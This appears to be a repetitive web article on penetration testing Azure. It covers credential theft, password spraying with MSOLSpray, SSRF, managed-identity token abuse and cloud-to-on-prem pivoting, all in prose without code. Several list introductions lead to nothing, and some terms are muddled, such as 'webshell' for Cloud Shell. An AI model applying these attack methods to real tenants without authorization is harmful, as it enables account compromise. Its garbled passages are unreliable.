Pentesting Azure Applications PDF: Azure Security Testing Essentials

Pentesting Azure applications requires a deep understanding of Azure's security features and vulnerabilities.

Azure provides a range of security features, including Azure Active Directory (Azure AD), which offers multi-factor authentication and conditional access.

Pentesters can use Azure AD's security features to their advantage by simulating real-world attacks and identifying vulnerabilities.

Azure's network security groups (NSGs) and Azure firewall can be used to block malicious traffic and prevent lateral movement.

To audit an Azure environment, you need to know which services are being used, what's being exposed, who has access to what, and how internal Azure services and external services are connected.

First, you need to gather information about the Azure environment, which can be done through various means such as leaks in GitHub, social engineering, or password reuse.

To compromise an Azure environment, obtaining some credentials for Azure AD is the first step. You can gather information from the environment even if you haven't compromised any user inside the Azure tenant you are attacking.

Here are some common ways to obtain credentials:

After obtaining credentials, you need to perform some basic enumeration to know to whom those creds belong and what they have access to.

When pentesting an Azure environment, it's essential to know which services are being used, what's being exposed, who has access to what, and how internal Azure services and external services are connected.

To compromise an Azure environment, obtaining some credentials for Azure AD is the first step. This can be done through various means such as leaks in GitHub, social engineering, password reuse, vulnerabilities in Azure-hosted applications, 3rd parties breached, internal employees, common phishing, or Azure password spraying.

You can gather information from an Azure tenant even if you haven't compromised any users inside it.

Here are some common methods to obtain Azure AD credentials:

After obtaining credentials, it's crucial to know to whom they belong and what they have access to, so basic enumeration is performed.

The noisiest part of the enumeration is the login, not the enumeration itself.

Corporations widely use Azure AD Active Directory due to its prevalence. This makes it a prime target for attackers.

Azure is a hybrid technology, which creates access control risks such as On-Prem to Cloud and On-Cloud to On-Prem. These risks can be exploited by attackers.

A compromised system on the cloud can be used to access the on-prem Active Directory controller. This can have devastating consequences for a company's security.

Attackers can also exploit vulnerabilities in web applications on Azure, putting the entire active directory infrastructure at risk. This can happen whether a company has an internal or external network structure.

Including Azure AD in penetration testing is crucial to identifying and addressing these risks.

Azure SSRF vulnerabilities can be a real challenge to identify and exploit. If you found a SSRF in a machine inside Azure, check this page for tricks.

SSRF vulnerabilities are often a result of misconfigured servers that allow attackers to access internal systems. This can lead to a wide range of attacks, including data theft and system compromise.

The example of a SSRF in a machine inside Azure suggests that this type of vulnerability can be found within the Azure environment. It's essential to be aware of this possibility and know how to identify and exploit it.

Understanding how SSRF vulnerabilities work is crucial in identifying and exploiting them. It's not just about finding the vulnerability, but also about knowing how to use it to gain access to sensitive systems.

If you're looking to test your Azure applications for SSRF vulnerabilities, knowing where to look is key. In this case, checking the page mentioned earlier can provide valuable insights and tricks for exploiting this type of vulnerability.

Azure Web Application Vulnerabilities can be exploited if your applications run with Azure Function Service or Azure App service permission, such as managed identity.

If a cyber attacker captures the access token belonging to the user, they can gain unauthorized access to Azure Resources. This is because managed identity allows applications to gain access to Azure Resources without explicit credentials.

A command execution vulnerability can be used to determine if an application is running with managed identity rights by checking if two specific variables are defined in the environment.

Web Application Vulnerabilities can be a major concern for Azure users. If your web applications run with Azure Function Service or Azure App service permission, such as managed identity, they can gain unauthorized access to Azure Resources if the access token is captured by a cyber attacker.

A command execution vulnerability can be a red flag, indicating the application is running with Managed Identity rights if the environment variables are defined. This can be a sign of a more serious issue.

The Azure Resource Manager (ARM) endpoint can be triggered to obtain an access token with Managed Identity rights, which can then be used to access Azure resources. You can get access tokens through the ARM endpoint.

Authenticated enumeration can be performed on Azure AD using the Az PowerShell tool after authenticating with Managed Identity. This allows you to access Azure resources with a specific command.

Webshell is a feature in Azure that allows you to access a command-line interface directly from a web browser.

You can access a webshell by going to portal.azure.com and selecting the shell, or by using shell.azure.com for a bash or PowerShell experience.

The storage account in Azure is where the image files of your webshell are stored, essentially serving as the "disk" of your shell.

Azure Cloud Testing requires a different approach than traditional penetration testing. It involves scrutinizing virtual machines, storage accounts, databases, and other cloud-based resources.

Cloud penetration testing must navigate layers of cloud-based controls and compliance rules, which is a unique challenge. This requires security experts to apply specialized techniques tailored for remote services.

In Azure Cloud Testing, testers focus on Internet-facing assets available anywhere with web access. This shift is critical in safeguarding data against cyber threats that evolve as quickly as cloud technologies.

Cloud-based controls and compliance rules can be complex and nuanced, making Azure Cloud Testing a sophisticated task.

Azure Network Security requires careful planning to ensure the security of your online environment. Prioritize your assets by risk level to focus your testing efforts effectively.

To safeguard your Azure environment, include Azure Active Directory (AD) in your testing scope, as it's a critical component with associated security risks. Regularly update and patch all systems to reduce the likelihood of successful exploits against known vulnerabilities.

Use a combination of automated and manual testing methods to identify vulnerabilities, and validate the effectiveness of your security controls, such as firewalls and intrusion detection systems. Conduct threat modeling for each component to anticipate attacks and strengthen defenses accordingly.

Here are the key recommendations for Azure Network Security:

If you have a web, mobile, or API application on Azure or use Blob Storage, you could potentially be a target of cyberattacks.

Most Azure Web Services applications run with Managed Identity permissions, making them vulnerable to attacks.

The on-prem AD environment may become a target if the attacker captures the access token belonging to a user.

Any corporate user on Azure AD may be the victim of a phishing attack, and a cyber attacker may steal their access token.

With these user rights, a cyber attacker could gain persistence on Azure AD.

Testing your internal network is crucial to ensure the security of your Azure network. It's essential to test with different user profiles, such as anonymous, company employee, and customer, to identify potential vulnerabilities.

You should also consider the rights of your corporate employees and their authority on Azure AD, especially if you're using Azure AD. Determine what rights your on-prem Active Directory users have to your cloud resources, and vice versa.

A password spraying or brute force attack can be launched from the cloud environment to your on-prem Active Directory, so be sure to monitor for this type of activity.

To stay on top of internal network security, consider the following potential risks:

Azure Authentication and Authorization is a crucial aspect of securing your Azure applications. Azure Active Directory (AAD) is the recommended identity and access management solution for Azure applications.

AAD provides multi-factor authentication, which requires users to provide two or more verification factors to access an application. This includes something you know, such as a password, and something you have, like a smartphone.

Azure also supports OpenID Connect (OIDC) and OAuth 2.0 protocols for authentication and authorization. These protocols allow applications to authenticate users and obtain access tokens to access protected resources.

To authenticate users, Azure applications can use the AAD authentication library, which provides a simple and secure way to authenticate users. This library supports various authentication flows, including username/password, social identity providers, and more.

The AD Attack Surface is a critical aspect of Azure Authentication and Authorization. It's the area where an attacker can gain access to sensitive information, and it's often overlooked.

In the case of Azure AD, reconnaissance can be done with just a company's domain name, such as Contoso.com. This can help you obtain the Tenant ID, which is a unique identifier for the Azure AD tenant.

The Azure AD attack surface can be further expanded using tools like GitHub: AADInternals. This tool can detect publicly accessible Azure blogs and connect to the store, allowing for enumeration and the exposure of confidential information.

With these tools and techniques, an attacker can gain a significant foothold in the AD attack surface, making it essential to be aware of these risks and take proactive measures to secure your Azure AD environment.

Password Spraying is a technique used to gain unauthorized access to Azure accounts. This method involves using a tool like MSOLSpray to obtain information.

One such tool, MSOLSpray, is capable of providing User Validation. This means an attacker can use it to check if a username and password combination is valid or not.

While MSOLSpray can be a powerful tool in the wrong hands, it's essential to understand how it works to stay one step ahead of potential threats.